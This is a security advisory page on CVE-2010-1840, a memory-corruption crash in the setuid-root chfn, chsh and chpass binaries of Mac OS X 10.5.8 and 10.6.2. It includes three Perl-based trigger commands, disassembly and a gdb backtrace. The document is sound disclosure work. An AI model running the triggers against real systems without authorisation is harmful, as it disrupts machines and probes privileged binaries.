Apple Directory Services Memory Corruption

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Apple Directory Services Memory Corruption CVE-2010-1840. Parsing issue in chfn, chpass, and chsh binaries allows crashing applications when parsing long strings, affecting Mac OS X 10.5.8 and 10.6.2. Disassembled code reveals crash location. Vulnerability mitigated by MacOS Heap Protection. Discovered by Rodrigo Rubira Branco from Check Point VDT

Reporter	Title	Published	Views	Family All 17
Tenable Nessus	Mac OS X 10.6 < 10.6.5 Multiple Vulnerabilities	11 Nov 201000:00	–	nessus
Tenable Nessus	Mac OS X 10.6 < 10.6.5 Multiple Vulnerabilities	11 Nov 201000:00	–	nessus
Tenable Nessus	Mac OS X 10.6.x < 10.6.5 Multiple Vulnerabilities	10 Nov 201000:00	–	nessus
Tenable Nessus	Mac OS X Multiple Vulnerabilities (Security Update 2010-007)	10 Nov 201000:00	–	nessus
Circl	CVE-2010-1840	11 Nov 201000:00	–	circl
CVE	CVE-2010-1840	15 Nov 201022:00	–	cve
Cvelist	CVE-2010-1840	15 Nov 201022:00	–	cvelist
Exploit DB	Apple Directory Services - Memory Corruption	11 Nov 201000:00	–	exploitdb
EUVD	EUVD-2010-1860	7 Oct 202500:30	–	euvd
exploitpack	Apple Directory Services - Memory Corruption	11 Nov 201000:00	–	exploitpack


                                                Apple Directory Services Memory Corruption
CVE-2010-1840


INTRODUCTION

chfn, chpass and chsh dos not properly parse authname switch (&#34;-u&#34;), which causes the applications to crash when parsing a long string. Those binaries are setuid root by default.

This problem was confirmed in the following versions of Apple binaries and MacOS, other versions may be also affected: 

Apple Mac OS X 10.5.8 32bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh
Apple Mac OS X 10.6.2 64bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh


CVSS Scoring System

The CVSS score is: 3.3
	Base Score: 4.2
	Temporal Score: 3.3
We used the following values to calculate the scores:
	Base score is: AV:L/AC:L/Au:R/C:C/I:C/A:C
	Temporal score is: E:POC/RL:OF/RC:C


TRIGGERING THE PROBLEM

/usr/bin/chfn -u `perl -e &#39;print &#34;A&#34; x 3000&#39;`
/usr/bin/chsh -u `perl -e &#39;print &#34;A&#34; x 3000&#39;`
/usr/bin/chpass -u `perl -e &#39;print &#34;A&#34; x 3000&#39;`


DETAILS

Disassembly:

0x92237215 &#60;CFArrayGetValueAtIndex+101&#62;:	mov    $0x28,%al
0x92237217 &#60;CFArrayGetValueAtIndex+103&#62;:	cmp    $0xc,%ecx
0x9223721a &#60;CFArrayGetValueAtIndex+106&#62;:	mov    $0x14,%dl
0x9223721c &#60;CFArrayGetValueAtIndex+108&#62;:	cmovne %edx,%eax
0x9223721f &#60;CFArrayGetValueAtIndex+111&#62;:	add    %esi,%eax
0x92237221 &#60;CFArrayGetValueAtIndex+113&#62;:	mov    0xc(%ebp),%edx
0x92237224 &#60;CFArrayGetValueAtIndex+116&#62;:	lea    (%eax,%edx,4),%eax
0x92237227 &#60;CFArrayGetValueAtIndex+119&#62;:	mov    (%eax),%eax &#60;----- Crash here.

(gdb) x/i $pc
0x92237227 &#60;CFArrayGetValueAtIndex+119&#62;:	mov    (%eax),%eax
(gdb) i r $eax
eax            0x585d910	92657936
(gdb) bt
#0  0x92237227 in CFArrayGetValueAtIndex ()
#1  0x9225c46b in _CFBundleTryOnePreferredLprojNameInDirectory ()
#2  0x9225d80c in _CFBundleAddPreferredLprojNamesInDirectory ()
#3  0x9224b7b0 in _CFBundleGetLanguageSearchList ()
#4  0x9225d8da in _CFBundleAddPreferredLprojNamesInDirectory ()
#5  0x9224b7b0 in _CFBundleGetLanguageSearchList ()
#6  0x9225b50c in CFBundleCopyResourceURL ()
#7  0x9225bb32 in CFBundleCopyLocalizedString ()
#8  0x903633eb in _ODNodeSetCredentials ()
#9  0x90369813 in ODRecordSetNodeCredentials ()
#10 0x000044be in ?? ()
#11 0x000026ac in ?? ()
#12 0x000022ee in ?? ()


The MacOS Heap Protection mechanisms mitigates the impact of this vulnerability.


CREDITS

This vulnerability was researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT).

ACKNOWLEDGES

Many thanks to Rafael Silva who brought the issue in chfn binary to our attention.




--
Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies
http://www.checkpoint.com/defense

01 Jul 2014 00:00Current

0.6Low risk

Vulners AI Score0.6

EPSS0.0436